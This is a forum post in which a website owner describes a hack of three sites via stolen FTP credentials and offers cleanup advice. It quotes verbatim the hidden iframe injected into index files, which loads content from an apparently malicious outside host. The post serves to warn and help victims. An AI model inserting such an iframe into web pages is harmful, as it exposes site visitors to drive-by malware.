Hi, this page comes up first when you search for:
PHP Code:
http//a3l.ru:8080/ts/in.cgi?pepsi85
so I figured I'll add what I found about this hack here for others to see. If you have more information about this, please register here and post (like I did).
First of all - this is a hack. It's done through somebody stealing your ftp credentials, then logging onto your site, searching for index.html and index.php files, and injecting the following code into it:
PHP Code:
<iframe src="http://a3l.ru:8080/ts/in.cgi?pepsi85" width=125 height=125 style="visibility: hidden"></iframe>
I had it happen to 3 websites I own. When browsing through ftp logs, I noticed somebody logging in with my user name and password, and getting it right the first time, so it wasn't a brute force attack. Also, each of my websites had different ftp username and password, which made it possible for me to find the culprit - I had all my ftp usernames, and passwords stored in FileZilla FTP client's site manager.
After a bit of research, I found out that FileZilla doesn't encrypt the passwords when they're stored, so that's one way somebody could get to them, and then use one of the password recovery programs which can be found freely online.
A more likely way however, is a trojan which installs itself on your computer and sniffs ftp packets, extracting passwords that way.
That means that no matter what ftp client you are using, your passwords will get stolen again, unless you get rid of the trojan. I am still in the process of trying to track it down on my computers.
For now, I would suggest you change your ftp passwords, and check all your index.html/ftp files for modification date, to make sure nobody added invisible iframes to them.
Here's more info on the packet sniffing trojan:
PHP Code:
http://www.google.com/support/forum/p/Google+Analytics/thread?tid=1f6452112c01bb78&hl=en